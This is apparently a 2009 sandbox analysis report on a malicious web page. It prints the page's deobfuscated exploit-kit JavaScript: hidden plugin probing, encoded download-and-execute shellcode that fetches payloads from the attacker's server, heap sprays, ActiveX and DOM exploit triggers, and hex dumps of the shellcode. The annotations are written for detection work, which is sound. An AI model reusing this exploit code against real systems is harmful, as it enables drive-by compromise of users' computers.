Analysis report for http://o0w0o.com/tmp/wedding.php
Sample Overview
| URL | http://o0w0o.com/tmp/wedding.php |
|---|
| MD5 | 698f08b84cad9436f364037134dfe730 |
| Analysis Started | 2009-10-18 23:47:02 |
| Report Generated | 2009-10-18 23:47:11 |
| Jsand version | 1.03.02 |
See the report for domain o0w0o.com.
Detection results
| Detector | Result |
| Jsand 1.03.02 | suspicious |
Exploits
No exploits were identified.
Deobfuscation results
Evals
// Stage 0: everything that follows is written into an absolutely positioned,
// off-screen <div>, so the plugin embeds/objects below never become visible.
// Detection note: a hidden container immediately followed by ActiveX probing
// is a strong page-level indicator on its own.
document.write("<div style=\"position:absolute; left:-1000px; top:-1000px;\">");
// Adobe Reader probe: tries two ProgIDs in turn. Both catch blocks are empty,
// so a missing control is ignored silently and VBjb simply stays null.
var VBjb = null;
try {
VBjb = new ActiveXObject("AcroPDF.PDF");
}
catch (e){
}
if (!VBjb){
try {
VBjb = new ActiveXObject("PDF.PdfCtrl");
}
catch (e){
}
}
if (VBjb){
// Version fingerprint: field 4 of GetVersions() (a "name=value" pair) with the
// dots stripped, e.g. "8.1.3" -> "813". lv is an implicit global and a string;
// the < and != below coerce it to a number.
lv = ((VBjb.GetVersions().split(","))[4].split("="))[1].replace(/\./g, "");
// Only Reader builds that fingerprint below 900 and not equal to 813 receive the
// PDF (wedding.php ... id=2). Per this report's Network Activity that request
// returned 404 in the sandbox. The string literal is wrapped across lines by
// the report renderer; it is one document.write() call.
if ((lv < 900) && (lv != 813))document.write('
<embed src="http://o0w0o.com/tmp/wedding.php?s=Ve1EGObdc&id=2" width=100 height=100 type="
application/pdf"></embed>');
}
// Flash probe: VBjb is reused as a flag/array. GetVariable("$version") is split
// on "," and only its third field is examined (the ActiveX table in this report
// records the single GetVariable("$version") call).
try {
var VBjb = 0;
VBjb = (new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$" +
"version").split(",");
}
catch (e){
}
// Flash builds whose third version field is below 124 receive the SWF (id=3)
// through both an <object> and an <embed>; again one write() wrapped by the
// renderer.
if (VBjb && (VBjb[2] < 124))document.write('
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width=100 height=100 align=mi
ddle><param name="movie" value="http://o0w0o.com/tmp/wedding.php?s=Ve1EGObdc&id=3"/><param
name="quality" value="high"/><param name="bgcolor" value="#ffffff"/><embed src="http://o0
w0o.com/tmp/wedding.php?s=Ve1EGObdc&id=3"/></embed></object>');
// %u-encoded payload shared by the stages below; the "Shellcode and Malware"
// section of this report shows its decoded bytes. It is not used as-is: each
// later stage appends a %u-encoded download URL before calling unescape().
// Detection note: a long %uXXXX literal later passed to unescape() is the
// textbook shellcode-staging pattern.
var scode = "
%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F
%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703
%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D
%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF
%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA
%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087
%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF
%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34
%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85
%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC
%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64
%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B
%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC
%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1";
// Page-wide error handler (installed as window.onerror further down). Returning
// true tells the browser the error was handled, so a failed attempt never
// surfaces a script-error prompt to the user. It ignores all of its arguments.
var ek13 = function () {
  return true;
};
// Silence every runtime error on the page (ek13 always returns true), so that a
// probe or trigger that fails does not alert the user.
window.onerror = ek13;
// Payload #1: the shared scode plus a %u-encoded suffix. The ASCII column of the
// first dump in "Shellcode and Malware" ends in ".../wedding.php?s=Ve1EGObdc&id=12",
// i.e. the suffix is a download URL terminated by %u0000.
var scode1 = unescape(scode + "
%u7468%u7074%u2F3A%u6F2F%u7730%u6F30%u632E%u6D6F%u742F%u706D%u772F%u6465%u6964%u676E%u702E
%u7068%u733F%u563D%u3165%u4745%u624F%u6364%u6926%u3D64%u3231%u0000");
// Office Web Components probe. obj is an implicit global. The OWC11 fallback is
// only reached if the OWC10 constructor returns a falsy value without throwing;
// a throw goes straight to the outer empty catch and skips the whole block.
try {
obj = new ActiveXObject("OWC10.Spreadsheet");
if (!obj){
obj = new ActiveXObject("OWC11.Spreadsheet");
}
if (obj){
// Pulls in one more script (id=4) when the control exists.
document.write(
"<script src=http://o0w0o.com/tmp/wedding.php?s=Ve1EGObdc&id=4><\/script>");
// Heap spray #1: 0x99*2 strings, each sized toward 0x81000 bytes, made of the
// repeated 0x0b0c pattern followed by scode1. The doubling loop + substring is
// the classic spray fingerprint worth alerting on. "deletebigblock;" as printed
// is a bare identifier; presumably "delete bigblock" in the source, since the
// report shows the Evaluate calls below did run (an undefined reference here
// would have thrown to the outer catch).
var array = new Array();
var ls = 0x81000 - (scode1.length * 2);
var bigblock = unescape("%u0b0c%u0b0C");
while (bigblock.length < ls/2){bigblock+=bigblock;}var lh=bigblock.substring(0,ls/2);
deletebigblock;
for (i = 0; i < 0x99 * 2; i ++ ){
array[i] = lh + lh + scode1;
}
// Trigger: 1, 2, 0 and the window object are each passed to Evaluate() ten
// times, then the window object to msDataSourceObject() ten times. This
// report's ActiveX table records exactly those methods and counts, which makes
// them a good behavioural signature. The catch parameter `e` shadows the array
// `e` only inside each (empty) catch block.
e = new Array();
e.push(1);
e.push(2);
e.push(0);
e.push(window);
for (i = 0; i < e.length; i ++ ){
for (j = 0; j < 10; j ++ ){
try {
obj.Evaluate(e[i]);
}
catch (e){
}
}
}
// Writes the window object's string form to the status bar ("[object Window]"
// in the report); side-effect only.
window.status = e[3] + "";
for (j = 0; j < 10; j ++ ){
try {
obj.msDataSourceObject(e[3]);
}
catch (e){
}
}
}
}
catch (e){
}
// Payload #2 and heap spray #2: same scode with a suffix decoding (second dump
// in the report) to the id=13 URL; 0xC0 strings padded with the 0x0C0C pattern
// toward 0x100000 bytes each. "deleted15t;" is the same printing artefact as
// above. CollectGarbage() is an IE-only global; explicit calls to it are another
// common exploit-page indicator.
var scode2 = unescape(scode + "
%u7468%u7074%u2F3A%u6F2F%u7730%u6F30%u632E%u6D6F%u742F%u706D%u772F%u6465%u6964%u676E%u702E
%u7068%u733F%u563D%u3165%u4745%u624F%u6364%u6926%u3D64%u3331%u0000");
var o84r = new Array();
var m79k = 0x100000 - (scode2.length * 2 + 0x01020);
var d15t = unescape("%u0C0C%u0C0C");
while (d15t.length < m79k/2)d15t+=d15t;var f20b=d15t.substring(0,m79k/2);
deleted15t;
for (v95l = 0; v95l < 0xC0; v95l ++ )o84r[v95l] = f20b + scode2;
CollectGarbage();
// Third attempt, needing no ActiveX control: 1000 <img> elements are created, a
// <tbody> is created, cloned, cleared and released, garbage is collected, then
// every image src is set to a string starting with 0x0b0b and the clone's click
// property is read. NOTE(review): this looks like a DOM memory-corruption
// trigger against the browser itself; the report does not identify it, so
// treat that as an inference. r27n and o88j are implicit/var globals.
var m77k = unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var e89f = new Array();
for (var e45n = 0; e45n < 1000; e45n ++ )e89f.push(document.createElement("img"));
r27n = document.createElement("tbody");
r27n.click;
var o88j = r27n.cloneNode();
r27n.clearAttributes();
r27n = null;
CollectGarbage();
for (var e45n = 0; e45n < e89f.length; e45n ++ )e89f[e45n].src = m77k;
o88j.click;
// Closes the hidden container opened at the top of the page.
document.write("</div>");
(repeated 1 time)
Writes
<div style="position:absolute; left:-1000px; top:-1000px;">
(repeated 1 time)
<embed src="http://o0w0o.com/tmp/wedding.php?s=Ve1EGObdc&id=2" width=100 height=100 type=
"application/pdf"></embed>
(repeated 1 time)
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width=100 height=100 align=middle>
<param name="movie" value="http://o0w0o.com/tmp/wedding.php?s=Ve1EGObdc&id=3"/><param name="quality"
value="high"/><param name="bgcolor" value="#ffffff"/><embed src=
"http://o0w0o.com/tmp/wedding.php?s=Ve1EGObdc&id=3"/></embed></object>
(repeated 1 time)
<script src=http://o0w0o.com/tmp/wedding.php?s=Ve1EGObdc&id=4></script>
(repeated 1 time)
Network Activity
Requests
| URL | Status | Content Type |
| http://o0w0o.com/tmp/wedding.php | 200 | text/javascript |
| http://o0w0o.com/tmp/wedding.php?s=Ve1EGObdc&id=2 | 404 | text/html |
Redirects
No redirects.
ActiveX controls
-
| D27CDB6E-AE6D-11CF-96B8-444553540000 |
|
Name | Value | Count |
| Attributes |
bgcolor |
#ffffff |
1 |
| quality |
high |
1 |
| movie |
http://o0w0o.com/tmp/wedding.php?s=Ve1EGObdc&id=3 |
1 |
-
| ShockwaveFlash.ShockwaveFlash.9 |
|
Name |
Arg0 |
Count |
| Methods |
GetVariable |
$version |
1 |
-
| AcroPDF.PDF |
| No attribute setting or method call detected |
-
| OWC10.Spreadsheet |
|
Name |
Arg0 |
Count |
| Methods |
msDataSourceObject |
[object Window] |
10 |
| Evaluate |
[object Window] |
10 |
0.0 |
10 |
2.0 |
10 |
1.0 |
10 |
-
| clsid:ca8a9780-280d-11cf-a24d-444553540000 |
|
Name |
Count |
| Methods |
GetVersions |
1 |
Shellcode and Malware
| Hexadecimal | ASCII |
43 43 43 43 43 43 eb 0f 5b 33 c9 66 b9 80 01 80
33 ef 43 e2 fa eb 05 e8 ec ff ff ff 7f 8b 4e df
ef ef ef 64 af e3 64 9f f3 42 64 9f e7 6e 03 ef
eb ef ef 64 03 b9 87 61 a1 e1 03 07 11 ef ef ef
66 aa eb b9 87 77 11 65 e1 07 1f ef ef ef 66 aa
e7 b9 87 ca 5f 10 2d 07 0d ef ef ef 66 aa e3 b9
87 00 21 0f 8f 07 3b ef ef ef 66 aa ff b9 87 2e
96 0a 57 07 29 ef ef ef 66 aa fb af 6f d7 2c 9a
15 66 aa f7 06 e8 ee ef ef b1 66 9a cb 64 aa eb
85 ee b6 64 ba f7 b9 07 64 ef ef ef bf 87 d9 f5
c0 9f 07 78 ef ef ef 66 aa f3 64 2a 6c 2f bf 66
aa cf 87 10 ef ef ef bf 64 aa fb 85 ed b6 64 ba
f7 07 8e ef ef ef ec aa cf 28 ef b3 91 c1 8a 28
af eb 97 8a ef ef 10 9a cf 64 aa e3 85 ee b6 64
ba f7 07 af ef ef ef 85 e8 b7 ec aa cb dc 34 bc
bc 10 9a cf bf bc 64 aa f3 85 ea b6 64 ba f7 07
cc ef ef ef 85 ef 10 9a cf 64 aa e7 85 ed b6 64
ba f7 07 ff ef ef ef 85 10 64 aa ff 85 ee b6 64
ba f7 07 ef ef ef ef ae b4 bd ec 0e ec 0e ec 0e
ec 0e 6c 03 eb b5 bc 64 35 0d 18 bd 10 0f ba 64
03 64 92 e7 64 b2 e3 b9 64 9c d3 64 9b f1 97 ec
1c b9 64 99 cf ec 1c dc 26 a6 ae 42 ec 2c b9 dc
19 e0 51 ff d5 1d 9b e7 2e 21 e2 ec 1d af 04 1e
d4 11 b1 9a 0a b5 64 04 64 b5 cb ec 32 89 64 e3
a4 64 b5 f3 ec 32 64 eb 64 ec 2a b1 b2 2d e7 ef
07 1b 11 10 10 ba bd a3 a2 a0 a1 ef 68 74 74 70
3a 2f 2f 6f 30 77 30 6f 2e 63 6f 6d 2f 74 6d 70
2f 77 65 64 64 69 6e 67 2e 70 68 70 3f 73 3d 56
65 31 45 47 4f 62 64 63 26 69 64 3d 31 32 00 00
| CCCCCC..[3.f....
3.C...........N.
...d..d..Bd..n..
...d...a........
f....w.e......f.
...._.-.....f...
..!...;...f.....
..W.)...f...o.,.
.f........f..d..
...d....d.......
...x...f..d*l/.f
........d.....d.
.........(.....(
.........d.....d
..............4.
......d.....d...
.........d.....d
.........d.....d
................
..l....d5......d
.d..d...d..d....
..d.....&..B.,..
..Q......!......
......d.d...2.d.
.d...2d.d.*..-..
............http
://o0w0o.com/tmp
/wedding.php?s=V
e1EGObdc&id=12..
|
43 43 43 43 43 43 eb 0f 5b 33 c9 66 b9 80 01 80
33 ef 43 e2 fa eb 05 e8 ec ff ff ff 7f 8b 4e df
ef ef ef 64 af e3 64 9f f3 42 64 9f e7 6e 03 ef
eb ef ef 64 03 b9 87 61 a1 e1 03 07 11 ef ef ef
66 aa eb b9 87 77 11 65 e1 07 1f ef ef ef 66 aa
e7 b9 87 ca 5f 10 2d 07 0d ef ef ef 66 aa e3 b9
87 00 21 0f 8f 07 3b ef ef ef 66 aa ff b9 87 2e
96 0a 57 07 29 ef ef ef 66 aa fb af 6f d7 2c 9a
15 66 aa f7 06 e8 ee ef ef b1 66 9a cb 64 aa eb
85 ee b6 64 ba f7 b9 07 64 ef ef ef bf 87 d9 f5
c0 9f 07 78 ef ef ef 66 aa f3 64 2a 6c 2f bf 66
aa cf 87 10 ef ef ef bf 64 aa fb 85 ed b6 64 ba
f7 07 8e ef ef ef ec aa cf 28 ef b3 91 c1 8a 28
af eb 97 8a ef ef 10 9a cf 64 aa e3 85 ee b6 64
ba f7 07 af ef ef ef 85 e8 b7 ec aa cb dc 34 bc
bc 10 9a cf bf bc 64 aa f3 85 ea b6 64 ba f7 07
cc ef ef ef 85 ef 10 9a cf 64 aa e7 85 ed b6 64
ba f7 07 ff ef ef ef 85 10 64 aa ff 85 ee b6 64
ba f7 07 ef ef ef ef ae b4 bd ec 0e ec 0e ec 0e
ec 0e 6c 03 eb b5 bc 64 35 0d 18 bd 10 0f ba 64
03 64 92 e7 64 b2 e3 b9 64 9c d3 64 9b f1 97 ec
1c b9 64 99 cf ec 1c dc 26 a6 ae 42 ec 2c b9 dc
19 e0 51 ff d5 1d 9b e7 2e 21 e2 ec 1d af 04 1e
d4 11 b1 9a 0a b5 64 04 64 b5 cb ec 32 89 64 e3
a4 64 b5 f3 ec 32 64 eb 64 ec 2a b1 b2 2d e7 ef
07 1b 11 10 10 ba bd a3 a2 a0 a1 ef 68 74 74 70
3a 2f 2f 6f 30 77 30 6f 2e 63 6f 6d 2f 74 6d 70
2f 77 65 64 64 69 6e 67 2e 70 68 70 3f 73 3d 56
65 31 45 47 4f 62 64 63 26 69 64 3d 31 33 00 00
| CCCCCC..[3.f....
3.C...........N.
...d..d..Bd..n..
...d...a........
f....w.e......f.
...._.-.....f...
..!...;...f.....
..W.)...f...o.,.
.f........f..d..
...d....d.......
...x...f..d*l/.f
........d.....d.
.........(.....(
.........d.....d
..............4.
......d.....d...
.........d.....d
.........d.....d
................
..l....d5......d
.d..d...d..d....
..d.....&..B.,..
..Q......!......
......d.d...2.d.
.d...2d.d.*..-..
............http
://o0w0o.com/tmp
/wedding.php?s=V
e1EGObdc&id=13..
|
Additional (potential) malware:
| URL | Type | Hash | Analysis |
| http://o0w0o.com/tmp/wedding.php?s=Ve1EGObdc&id=12 |
N/A |
N/A |
|
| http://o0w0o.com/tmp/wedding.php?s=Ve1EGObdc&id=13 |
N/A |
N/A |
|
| http://o0w0o.com/tmp/wedding.php?s=Ve1EGObdc&id=3 |
N/A |
N/A |
|